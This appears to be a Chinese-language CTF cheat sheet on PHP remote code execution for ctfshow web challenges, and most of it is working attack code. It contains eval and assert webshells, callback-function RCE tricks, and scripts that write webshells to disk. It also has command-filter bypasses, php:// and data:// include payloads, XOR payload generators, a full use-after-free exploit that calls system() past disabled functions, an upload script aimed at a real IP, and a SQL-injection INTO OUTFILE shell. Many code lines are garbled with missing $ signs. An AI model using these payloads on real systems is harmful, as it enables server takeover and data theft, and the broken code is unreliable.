<?php 

  eval($_POST[cmd])

  ?>

<?php

$a = 199;

eval("echo\$a;");

<?php

$str = "array('a'=>'123','b'=>'456')";

eval("\arr = ".str.";");

var_dump($arr);

<?php

a = _GET['a'];

eval($a);

//a = eval($_GET['1']);&1=phpinfo();

?>

<?php

eval($_POST['a']);

?>

//如果想在a中再放一个可以任意控制的参数绕过正则检测

不能直接令a=$_POST[1]

尝试：

a = system($_POST[1]); //1可以执行一些系统命令

<?php 

$string = "beautiful"; 

$time = "winter";  

str = 'This is a string $time morning!'; 

echo $str. "<br />";  

eval("\str = \"str\";"); 

echo $str; ?>

assert(mixed assertion, string description = ?): bool

assert(mixed assertion, Throwable exception = ?): bool

preg_replace(

string|array $pattern,    

string|array $replacement,

string|array $subject,

int $limit = -1,

int &$count = null

): string|array|null

<?php 

//?cmd=phpinfo();

@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd"); //cmd=system("ls");

?>

create_function(string args, string code): string

 第一个参数是函数接受的参数，第二个参数是函数的执行体

newfunc = create_function('', '_REQUEST['cmd']');eval($_POST{1})

$newfunc();

array_map(callable callback, array array, array ...$arrays): array

<?php

//func = system 

func = _GET['func'];

//cmd = ls

cmd=_GET['cmd'];

array[0] = cmd

new_array = array_map(func,$array); // 返回执行结果后的新数组

//print_r($new_array);

?>

call_user_func(callable callback, mixed parameter = ?, mixed $... = ?): mixed

<?php

cmd=_REQUEST['cmd'];====>_GET['cmd']||_POST['cmd']

//cmd = phpinfo()

call_user_func(assert,$cmd);//assert(phpinfo();)

?>

call_user_func_array(callable callback, array param_arr): mixed

<?php

func = _REQUEST['func'];

cmd = _REQUEST['cmd'];

array['0'] = cmd

result = call_user_func_array(func,$cmd);

//print_r($result);

?>

array_filter(array array, ?callable callback = null, int $mode = 0): array

<?php 

func = _GET['func'];

cmd = _GET['cmd'];

array1=array(cmd);

array_filter(array1,func)

?>

usort(array &array, callable callback): bool

php环境>=5.6才能用

<?php usort(...$_GET);?>

利用方式：

test.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert

[POST]:x=phpinfo();

php环境>=<5.6才能用

<?php usort($_GET,'asse'.'rt');?>

利用方式：

test.php?1=1+1&2=eval($_POST[x])

[POST]:x=phpinfo();

file_put_contents(

string $filename,

mixed $data,

int $flags = 0,

resource $context = ?

): int

<?php 

test='<?php eval(_POST[cmd]);?>';

file_put_contents('test.php',$test);

?>

  <?php

fputs(fopen('shell.php','w'),'<?php eval($_REQUEST[1]);?>')

?>

<?php

#a=assert&b=system('ls')

_GET['a'](_GET['b']);

?>

include('flag.php');

或者

include 'flag.php';

姿势绕过

include $_GET[1]?>&1=flag.php

highlight_file(string filename, bool return = false): mixed

highlight_file 'flag.php'

system(string command, int &return_var = ?): string

<?php

//a = system('ls')

a = _REQUEST[a];

eval($a);

?>

shell_exec(string $cmd): string

<?php

$output = shell_exec('ls -lart');

echo "<pre>$output</pre>"; // 需要输出显示结果

//print($output);

?>

exec(string command, array &output = ?, int &$return_var = ?): string

<?php

echo exec("whoami");

?>

注意：该函数能够执行系统命令，但是返回结果是有限度的(即返回不全)

# 例如：exec('ping 127.0.0.1');	可执行，显示不出来

# print(exec('ping 127.0.0.1')); 可显示出来但，显示不完全

popen(string `$command`, string `$mode`): resource

<?php

$handle = popen("/bin/ls", "r");

?>

passthru(string `$command`, int `&$return_var` = ?): void

<?php

passthru ('echo $PATH');

?>

PHP：exec、shell_exec、system、passthru、popen、proc_open等

ASP.NET：System.Diagnostics.Start.Process、System.Diagnostics.Start.ProcessStartInfo等

Java：java.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec等

echo 111;

print 123;

die;

include " "

require " "

include_once " "

require_once " "

系统命令:

1. 里可以用? 匹配字符

2. 可以用;间隔两条命令

3. $? //上一次命令执行成功为0，不成功为1

4. env 查看本地变量

5. ``和$()可以代替shell_exec执行系统命令 //web396

6. nl * 打开目录下所有文件

PHP:

1. <?= ?>===<?php ?>

cmd1 | cmd2 只执行cmd2

cmd1 || cmd2 只有当cmd1执行失败后，cmd2才被执行

cmd1 & cmd2 先执行cmd1，不管是否成功，都会执行cmd2

cmd1 && cmd2 先执行cmd1，只有cmd1执行成功后才执行cmd2，否则不执行cmd2

cmd1 ; cmd2 按顺序依次执行，先执行cmd1再执行cmd2

?      #单个字符

*      #零个、单个或多个字符

/???/?s --help

#可代表 /bin/ls --help

/???/????64 f???.???

#可代表 /bin/base64 flag.php:base64 编码 flag.php 的内容。

/???/?[a][t] ?''?''?''?''

#可代表 /usr/bin/bzip2 flag.php: 将 flag.php 文件进行压缩，然后再将其下载。

/???/?at ????

/???/?[a]''[t] ?''?''?''?''

#可代表 /bin/cat: test:

(1)more:一页一页的显示档案内容

(2)less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页

(3)head:查看头几行

(4)tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示

(5)tail:查看尾几行

(6)nl：显示的时候，顺便输出行号

(7)od:以二进制的方式读取档案内容

(8)vi:一种编辑器，这个也可以查看

(9)vim:一种编辑器，这个也可以查看

(10)sort:可以查看

(11)uniq:可以查看

(12)file -f:报错出具体内容

(13)sed:一种编辑器，这个也可以查看

(14)grep

1、在当前目录中，查找后缀有 file 字样的文件中包含 test 字符串的文件，并打印出该字符串的行。此时，可以使用如下命令： grep test *file 

(15)strings

1.  ${IFS}替换

2.	 替换

3.	${IFS替换

	{IFS}9

4.	%20替换

5.	< 和 <> 重定向符替换

6.	%09替换(需要php环境)

7.  %0a %0b %0c %0d

1. a=c;b=at;c=fl;d=ag;ab cd

2. 题目:ctfshow-web31

* a = eval($_GET[1]);&1=.....

echo 1234 | base64

MTIzNAo=

echo 'MTIzNAo=' | base64 -d

1234

/bin/base64 1.txt 

MTIzCg==

c""at fl''ag

c\at fl\ag

cat /etc/pass'w'd

1. ?c=include $_GET["a"] ?>&a=php://filter/read=convert.base64-encode/resource=flag.php

2. ?c=include $_POST[1] ?>&1=php://filter/read=convert.base64-encode/resource=flag.php

1. ?c=data://text/plain,<?php echo system('cat fl*');?>

2. ?c=data://text/plain,<?php%20system('tac fl*');?>

3. ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

其中PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==的解码为<?php echo system('cat fl*');?>

c=print_r(scandir('.'));#查看当前目录

c=print_r(scandir('/'));#查看根目录

c=print_r(glob('*'));#查看当前目录

c=print_r(glob('/*'));#查看根目录

c=var_dump(scandir('.'));#查看当前目录

c=var_dump(scandir('/'));#查看根目录

c=var_dump(glob('*'));#查看当前目录

c=var_dump(glob('/*'));#查看根目录

c=var_export(scandir('.'));#查看当前目录

c=var_export(scandir('/'));#查看根目录

c=var_export(glob('*'));#查看当前目录

c=var_exportdump(glob('/*'));#查看根目录

c=

$a=new DirectoryIterator("glob:///*");

foreach(a as f){

echo $f."    " ;

}

exit();

或者

$a = "glob:///*.txt";

if(b=opendir(a)){

  while((file=readdir(b))!==false){

    echo "filename:".$b."\n";

  }

  close($b);

}

chr():根据ascii码值将数字转换成字符串

get_defined_vars() 获取题目相关变量

print_r() 函数用于打印变量，以更容易理解的形式展示

localeconv()：是一个编程语言函数，返回包含本地数字及货币信息格式的数组。其中数组中的第一个为点号(.)

pos()：返回数组中的当前元素的值。这里也可以换成current()，作用和pos类似

array_reverse()：数组逆序

scandir()：获取目录下的文件

next()： 函数将内部指针指向数组中的下一个元素，并输出。

current(): 返回数组当前值

reset(): 设置当前数组指针指向第一个单元

crypt(): 单项字符串散列，相当于将字符串转换为hash等的复杂字符串

floor():  舍去法取整

ceil(): 进一法取整

sinh/cosh(): 双曲正弦/余弦

scandir(string $directory): array: 列出指定路径中的文件和目录，返回一个 array，包含有 directory 中的文件和目录。

getcwd(): 获取当前工作目录

chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))

chr(ord(hebrevc(crypt(time()))))  #小概率

chr(ord(strrev(crypt(serialize(array()))))

payload:?c=print_r(scandir(current(localeconv())));

或者是 

?c=print_r(scandir(pos(localeconv())));	#pos 是 current 的别名，localeconv () 返回的数组中第一个值为 '.'

?c=print_r(scandir(reset(localeconv())));

?c=print_r(scandir(char(46));

?c=print_r(scandir(char(time()));	#不实际

?c=print_r(scandir(char(rand()));	#不实际

?c=print_r(scandir(char(current(localtime(time()))));

#chr () 函数以 256 为一个周期，则 chr (46),chr (302).chr (558) 均为 .

#char (current (localtime (time ()))) 数组第一个值是秒数，则每 60 秒均会有一个 46

print_r(scandir(chr(ord(hebrevc(crypt(time()))))));  #小概率

print_r(scandir(chr(ord(strrev(crypt(serialize(array()))))))); // 存在概率问题

print_r(scandir(getcwd()));

?c=highlight_file(next(array_reverse(scandir(current(localeconv())))));#读取数组倒数第二个元素

?c=show_source(next(arrray_reverse(scandir(getcwd()))));

?c=show_source(current(array_reverse(scandir(getcwd()))));#flag 在最后一个文件

?c=show_source(array_rand(array_flip(scandir(getcwd()))));

array_flip - 交换数组中的键和值

array_rand — 从数组中随机取出一个或多个随机键,有两个参数默认为1 

?c=show_source(array_rand(array_flip(scandir(current(localeconv())))));

#array_rand (array_flip ())，array_flip () 是交换数组的键和值，array_rand () 是随机返回一个数组

#getchwd () 函数返回当前工作目录。

ctfshow web40

{_} = ""

$(())=0

((~(())))=-1

36

PHP_CFLAGS=-fstack-protectcor-strong-fpic-fpie-o2-D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64

PHP_VERSION=7.3.22

SHLVL=2

[PATH] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

    [HOSTNAME] => glot-runner

    [PHPIZE_DEPS] => autoconf         dpkg-dev         file         g++         gcc         libc-dev         make         pkg-config         re2c

    [PHP_INI_DIR] => /usr/local/etc/php

    [PHP_CFLAGS] => -fstack-protector-strong -fpic -fpie -O2

    [PHP_CPPFLAGS] => -fstack-protector-strong -fpic -fpie -O2

    [PHP_LDFLAGS] => -Wl,-O1 -Wl,--hash-style=both -pie

    [GPG_KEYS] => 1729F83938DA44E27BA0F4D3DBDB397470D12172 B1B44D8F021E4E2D6021E995DC9FF8D3EE5AF27F

    [PHP_VERSION] => 7.2.1

    [PHP_URL] => https://secure.php.net/get/php-7.2.1.tar.xz/from/this/mirror

    [PHP_ASC_URL] => https://secure.php.net/get/php-7.2.1.tar.xz.asc/from/this/mirror

    [PHP_SHA256] => 6c6cf82fda6660ed963821eb0525214bb3547e8e29f447b9c15b2d8e6efd8822

    [PHP_MD5] => 

    [HOME] => /home/glot

    [PHP_SELF] => /tmp/543750210/main.php

    [SCRIPT_NAME] => /tmp/543750210/main.php

    [SCRIPT_FILENAME] => /tmp/543750210/main.php

    [PATH_TRANSLATED] => /tmp/543750210/main.php

    [DOCUMENT_ROOT] => 

    [REQUEST_TIME_FLOAT] => 1524198667.12

    [REQUEST_TIME] => 1524198667

    [argv] => Array

        (

            [0] => /tmp/543750210/main.php

        )

    [argc] => 1

)

tac====>{PHP_CFLAGS:{PHP_VERSION:{PHP_VERSION:~A}:~{SHLVL}}:{PHP_VERSION:{PHP_VERSION:~A}:~${SHLVL}}}

PHP_CFLAGS=-fstack-protectcor-strong-fpic-fpie-o2-D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64

PHP_VERSION=7.3.22

SHLVL=2

???? // 代表 base

{#PHP_VERSION}{PHP_CFLAGS:~A} // 代表 64

题目需要base64命令的绝对路径：

{PWD::{#SHLVL}} // 代表 '/'

${#SHLVL} //# 用来求变量值的长度

初次完整的命令：

{PWD::{#SHLVL}}???{PWD::{#SHLVL}}????{#PHP_VERSION}{PHP_CFLAGS:~A} ????.??? // 长度超过限制需要缩减

随机数:

${RANDOM} // 随机代表一个数

${#RANDOM} // 代表这个随机数的长度

由于64代表的字符串过长，将6代表的字符串去掉(用？代替)将4代表的字符串用随机数的长度字符串代替

最终的语句：

{PWD::{#SHLVL}}???{PWD::{#SHLVL}}?????{#RANDOM} ????.??? // 带有随机性，只要 {RANDOM} 是一个四位数就可以，多试几次

base_convert(1231231131,10,36) ===>hex2bin

hex2bin(dechex(1598506324))=======>_GET

hex2bin(dechex(1598506324))=======>_GET

<?php

function ctfshow($cmd) {

global abc, helper, $backtrace;

class Vuln {

public $a;

public function __destruct() { 

global $backtrace; 

unset($this->a);

$backtrace = (new Exception)->getTrace();

if(!isset($backtrace[1]['args'])) {

$backtrace = debug_backtrace();

}

}

}

class Helper {

public a, b, c, d;

}

function str2ptr(&str, p = 0, $s = 8) {

$address = 0;

for(j = s-1; j >= 0; j--) {

$address <<= 8;

address |= ord(str[p+j]);

}

return $address;

}

function ptr2str(ptr, m = 8) {

$out = "";

for (i=0; i < m; i++) {

out .= sprintf("%c",(ptr & 0xff));

$ptr >>= 8;

}

return $out;

}

function write(&str, p, v, n = 8) {

$i = 0;

for(i = 0; i < n; i++) {

str[p + i] = sprintf("%c",(v & 0xff));

$v >>= 8;

}

}

function leak(addr, p = 0, $s = 8) {

global abc, helper;

write(abc, 0x68, addr + $p - 0x10);

leak = strlen(helper->a);

if(s != 8) { leak %= 2 << ($s * 8) - 1; }

return $leak;

}

function parse_elf($base) {

e_type = leak(base, 0x10, 2);

e_phoff = leak(base, 0x20);

e_phentsize = leak(base, 0x36, 2);

e_phnum = leak(base, 0x38, 2);

for(i = 0; i < e_phnum; i++) {

header = base + e_phoff + i * $e_phentsize;

p_type = leak(header, 0, 4);

p_flags = leak(header, 4, 4);

p_vaddr = leak(header, 0x10);

p_memsz = leak(header, 0x28);

if(p_type == 1 && p_flags == 6) { 

data_addr = e_type == 2 ? p_vaddr : base + $p_vaddr;

data_size = p_memsz;

} else if(p_type == 1 && p_flags == 5) { 

text_size = p_memsz;

}

}

if(!data_addr || !text_size || !$data_size)

return false;

return [data_addr, text_size, $data_size];

}

function get_basic_funcs(base, elf) {

list(data_addr, text_size, data_size) = elf;

for(i = 0; i < data_size / 8; i++) {

leak = leak(data_addr, $i * 8);

if(leak - base > 0 && leak - base < data_addr - base) {

deref = leak(leak);

if($deref != 0x746e6174736e6f63)

continue;

} else continue;

leak = leak(data_addr, ($i + 4) * 8);

if(leak - base > 0 && leak - base < data_addr - base) {

deref = leak(leak);

if($deref != 0x786568326e6962)

continue;

} else continue;

return data_addr + i * 8;

}

}

function get_binary_base($binary_leak) {

$base = 0;

start = binary_leak & 0xfffffffffffff000;

for(i = 0; i < 0x1000; $i++) {

addr = start - 0x1000 * $i;

leak = leak(addr, 0, 7);

if($leak == 0x10102464c457f) {

return $addr;

}

}

}

function get_system($basic_funcs) {

addr = basic_funcs;

do {

f_entry = leak(addr);

f_name = leak(f_entry, 0, 6);

if($f_name == 0x6d6574737973) {

return leak($addr + 8);

}

$addr += 0x20;

} while($f_entry != 0);

return false;

}

function trigger_uaf($arg) {

$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

$vuln = new Vuln();

vuln->a = arg;

}

if(stristr(PHP_OS, 'WIN')) {

die('This PoC is for *nix systems only.');

}

$n_alloc = 10; 

$contiguous = [];

for(i = 0; i < n_alloc; i++)

$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

trigger_uaf('x');

abc = backtrace[1]['args'][0];

$helper = new Helper;

helper->b = function (x) { };

if(strlen(abc) == 79 || strlen(abc) == 0) {

die("UAF failed");

}

closure_handlers = str2ptr(abc, 0);

php_heap = str2ptr(abc, 0x58);

abc_addr = php_heap - 0xc8;

write($abc, 0x60, 2);

write($abc, 0x70, 6);

write(abc, 0x10, abc_addr + 0x60);

write($abc, 0x18, 0xa);

closure_obj = str2ptr(abc, 0x20);

binary_leak = leak(closure_handlers, 8);

if(!(base = get_binary_base(binary_leak))) {

die("Couldn't determine binary base address");

}

if(!(elf = parse_elf(base))) {

die("Couldn't parse ELF header");

}

if(!(basic_funcs = get_basic_funcs(base, $elf))) {

die("Couldn't get basic_functions address");

}

if(!(zif_system = get_system(basic_funcs))) {

die("Couldn't get zif_system address");

}

$fake_obj_offset = 0xd0;

for(i = 0; i < 0x110; $i += 8) {

write(abc, fake_obj_offset + i, leak(closure_obj, $i));

}

write(abc, 0x20, abc_addr + $fake_obj_offset);

write($abc, 0xd0 + 0x38, 1, 4); 

write(abc, 0xd0 + 0x68, zif_system); 

(helper->b)(cmd);

exit();

}

ctfshow("cat /flag0.txt");ob_end_flush();

?>

<?php

ini_set('open_basedir','/var/www/html');

$a = eval(system('tac /flag.txt')); // 仍然可以执行

?>

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>POST数据包POC</title> </head> <body> <form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data"> <!--链接是当前打开的题目链接--> <label for="file">文件名：</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="提交"> </form> </body> </html>

tmp目录下文件比较多，我们所上传的文件最后一个字母是大写，因此利用ascii字母的大写匹配，过滤掉其他文件[@-[]

<?php

/*author yu22x*/

$myfile = fopen("xor_rce.txt", "w");  // 以写的方式打开 txt 文件

$contents="";

for (i=0; i < 256; $i++) {  //ascii 码只占一个字节，所以设置最大数 256

  // 两个 for 循环总共 256*256 中可能的情况

  for (j=0; j <256 ; $j++) {  // 通过 i，j 来构造字母

    if($i<16){ //ascii 的前 16 个字符的十六进制应该是 01，02，。。。。下面为了格式化数字加上了 0

      hex_i='0'.dechex(i); //dechex (十进制转换成十六进制)

    }

    else{

      hex_i=dechex(i); /// 将所有的数字转换成十六进制

    }

    if($j<16){

      hex_j='0'.dechex(j);

    }

    else{

      hex_j=dechex(j);

    }

    $preg = '/[a-z0-9]/i'; // 根据题目给的正则表达式修改即可

    if(preg_match(preg , hex2bin(hex_i))||preg_match(preg , hex2bin(hex_j))){// 过滤掉被匹配的字符

      echo "";

    }

    else{

    a='%'.hex_i;

    b='%'.hex_j;

    c=(urldecode(a)^urldecode($b));

    if (ord(c)>=32&ord(c)<=126) {  //32 到 126 是 ascii 码的所有可显示字符

      contents=contents.c." ".a." ".$b."\n";

      }

    }

}

}

fwrite(myfile,contents); /// 将我们得到的所有字符写入之前打开的文件

fclose($myfile);// 关闭文件

# -*- coding: utf-8 -*-

# author yu22x

import requests

import urllib

from sys import *

import os

def action(arg): // 定义 action 函数

  s1=""  // 用于异或的第一个字符串

  s2=""  // 用于异或的第二个字符串

  for i in arg:  //i 表示 arg 的一个字符

    f=open("xor_rce.txt","r")  // 打开 php 脚本生成的 xor_rce.txt

    while True:

      t=f.readline() // 一行一行读取文件

      if t=="":   // 读取完毕就结束

        break

      if t[0]==i: //t [0] 也就是文件中的第一列，32-126 个可显示的 ascii 码字符

        #print(i)

        s1+=t[2:5] // 截取 i 所在行第 3 列到第 5 列表示第一个字符串

        s2+=t[6:9] /// 截取 i 所在行第 7 列到第 9 列表示第二个字符串

        break

    f.close()

  output="(\""+s1+"\"^\""+s2+"\")" /// 对两个字符串进行异或

  return(output)

while True:

// 我们输入的函数和命令被作为 arg

param=action(input("\n[+] your function：") )+action(input("[+] your command："))+";"

print(param)

$ffi=FFI::cdef("int system(const char *command);");

$a = '/readflag > /var/www/html/1.txt';

ffi->system(a);exit();

<?php

preg_match('/^*.(flag).*/',cmd){

  echo hacker;

}

// 令 $cmd=\nflag

?>

<?php

preg_match('/^flag/',_GET['a']&&$_GET['a']!==flag){

  echo $flag;

}

//a=flag%0a

?>

if(_GET['b_u_p_t'] !== '23333' && preg_match('/^23333/', $_GET['b_u_p_t'])){

echo "you are going to the next ~";

}

//getIp();?b.u.p.t=23333%0a

<?php

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\|||{|}|\(|\)|-|<|>/i", cmd)) {

echo("forbid ~");

echo "<br>";

}

$cmd=ca\t%20/flag // 可以绕过对 cat 的正则

$cmd=l\s%20/      // 可以绕过对 ls 的正则

?>

import requests

from io import BytesIO

files = {

  'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000)

}

res = requests.post('http://51.158.75.42:8088/index.php', files=files, allow_redirects=False)

print(res.headers)

?url=0://www.baidu.com;'union/**/select/**/1,0x33C3F70687020726571756972652027636F6E6669672E706870273B2473716C3D2773656C65637420666C61672066726F6D20666C616720696E746F206F757466696C6520222F7661722F7777772F68746D6C2F31302E74787422273B24726573756C74203D2024636F6E6E2D3E7175657279282473716C293B7661725F64756D702824726573756C74293B3F3E/**/into/**/outfile/**/"/var/www/html/1.php"/**/%23;